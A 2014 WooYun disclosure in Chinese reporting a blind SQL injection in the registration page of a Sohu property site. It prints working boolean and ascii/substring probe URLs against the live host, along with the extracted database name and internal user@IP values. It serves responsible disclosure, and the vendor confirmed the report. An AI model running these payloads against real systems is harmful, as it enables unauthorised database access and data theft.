[公开漏洞]搜狐某站点用户注册处存在SQL盲注漏洞

搜狐某站点用户注册处存在SQL盲注漏洞 相关厂商： 搜狐 漏洞作者：梧桐雨 提交时间：2014-05-15 11:27 公开时间：2014-06-29 11:28 漏洞类型：SQL注射漏洞 危害等级：高 自评Rank：15 漏洞状态： 厂商已经确认 漏洞来源：http://www.wooyun.org Tags标签： php+数字类型注射 漏洞详情 披露状态：

2014-05-15：细节已通知厂商并且等待厂商处理中
2014-05-15：厂商已经确认，细节仅向厂商公开
2014-05-25：细节向核心白帽子及相关领域专家公开
2014-06-04：细节向普通白帽子公开
2014-06-14：细节向实习白帽子公开
2014-06-29：细节向公众公开

简要描述：

手工盲注是要吐血的。。

详细说明：

http://home.focus.cn/



存在注入站点如上



存在注入链接





http://home.focus.cn/common/modules/spk/reg.php?id=628



正常访问：

http://home.focus.cn/common/modules/spk/reg.php?id=628

返回：

加单引号之后：

http://home.focus.cn/common/modules/spk/reg.php?id=628'

http://home.focus.cn/common/modules/spk/reg.php?id=628 and 1=1



http://home.focus.cn/common/modules/spk/reg.php?id=628 and 1=2



返回不一样，虽然没有报错但是可以肯定是一个盲注点。而且还是一个数字类型的盲注。

漏洞证明：

判断database()长度



http://home.focus.cn/common/modules/spk/reg.php?id=628 and (length(database())=6) and 1=1



得到结果是6



进一步猜测

http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(database(),1,1)) = 98) and 1=1

返回错误

http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(database(),1,1)) = 99) and 1=1

返回正常，说明第一个字母是c



以此类推可猜测出数据库名为：

common



猜user()



http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(user(),1,1)) = 102) and 1=1



http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(user(),2,1)) = 100) and 1=1



http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(user(),3,1)) = 98) and 1=1



以此类推，得到

fdbuser@10.11.8.2

fdbuser@10.10.80.82



这里有个小技巧，猜解出现了2个user，应该是连接数据库用户有2个，所以得到结果不一。



一般盲注到这里不用怀疑，肯定是2个user了。



猜测version版本，得mysql5.0

修复方案：

过滤参数id

版权声明：转载请注明来源 梧桐雨@乌云 漏洞回应 厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-05-15 11:38

厂商回复：

感谢支持。

最新状态：

暂无